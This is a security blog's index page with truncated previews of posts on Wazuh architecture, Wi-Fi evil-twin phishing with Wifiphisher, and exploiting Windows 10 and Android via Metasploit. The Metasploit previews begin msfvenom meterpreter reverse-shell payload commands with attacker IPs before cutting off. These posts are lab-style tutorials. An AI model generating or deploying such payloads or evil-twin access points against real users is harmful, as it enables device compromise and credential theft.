Posts

Wazuh Architecture Overview : A Complete Guide to Security Monitoring

Image
  WAZUH ARCHITECTURE OVERVIEW Hi everyone! Whether you're new to Wazuh or looking to deepen your understanding of its architecture, this guide will walk you through its core components, data flow, and deployment best practices. In this post, I break down how Wazuh’s agent-server-indexer model works, how data is securely moved between components, and why its architecture makes it a scalable solution for security teams of all sizes. Let’s dive in! Wazuh Architecture Overview  Wazuh is a powerful security monitoring solution that utilizes agents to collect and forward security data from monitored endpoints to a central server. The architecture supports both agent-based and agentless monitoring, ensuring flexibility in various network environments. Wazuh Architecture Components The Wazuh architecture is primarily composed of agents, a central server, and an indexer. The agents run on monitored endpoints and are responsible for forwarding security data to the Wazuh server. In a...

Wifi phishing using Wifiphisher

Image
  Hello everyone , this blog is related to Wifi phishing . So , lets get started. What is Wifi phishing? Wifi phishing is when cyber criminals create a malicious Wifi  access point that appears similar or identical to a legitimate Wifi  access point. This malicious Wifi access point is sometimes known  as the "evil twin".   Unsuspecting users can be fooled into connecting to the malicious WiFI point in the belief it is the legitimate connection. Once connected to the cyber criminals' network, the user will still have an internet connection, but the criminal has access to that user’s system. Because of the open access that wireless networks offer, securing the platform from phishing and many other attacks becomes difficult. Individuals who are not aware of proper security protocols when accessing a WiFi connection, will easily be made a victim to phishing attacks. REQUIREMENTS : Internet Connection and a external adaptor STEPS: 1.  Get connected to an ...

Exploting Windows using Metasploit on Kali linux

Image
 Hello everyone, this blog is related to exploiting windows system(win-10) using Kali Linux. So, basically we need two operating systems, First one is kali(attacker) and second one is Windows(victim). This Practical works when both of the machines are in same network. So. I have installed Kali-linux and windows-10 in Virtualbox. And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network, This also works if you have host machine kali and on other side you have windows-10(PC) with you. You can also install kali on Virtualbox and set it to NAT network(Bridge is recommended). For surety u can ping the windows 10 machine from Kali to check that the machines are on same network or not. Practical Starts Here -  1. go to kali terminal and type the following command.   type your kali ip instead of  10.0.2.4 msfvenom -p windows/x64/meterpret...

Exploting Android using Metasploit on Kali linux

Image
  Hello everyone, this blog is related to exploiting Android system using Kali Linux. So, basically we need two operating systems, First one is kali(attacker) and second one is Android(victim). This Practical works when both of the machines are in same network. So. I have installed Kali-linux in Virtualbox and I am using Genymotion for Android. And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network, This also works if you have host machine kali and on other side you have Android Device with you. You can also install kali on Virtualbox and set it to NAT network. For surety u can ping the Android Device machine from Kali to check that the machines are on same network or not. Practical Starts Here -  1. go to kali terminal and type the following command.  type your kali ip instead of  170.9.210.105        msfv...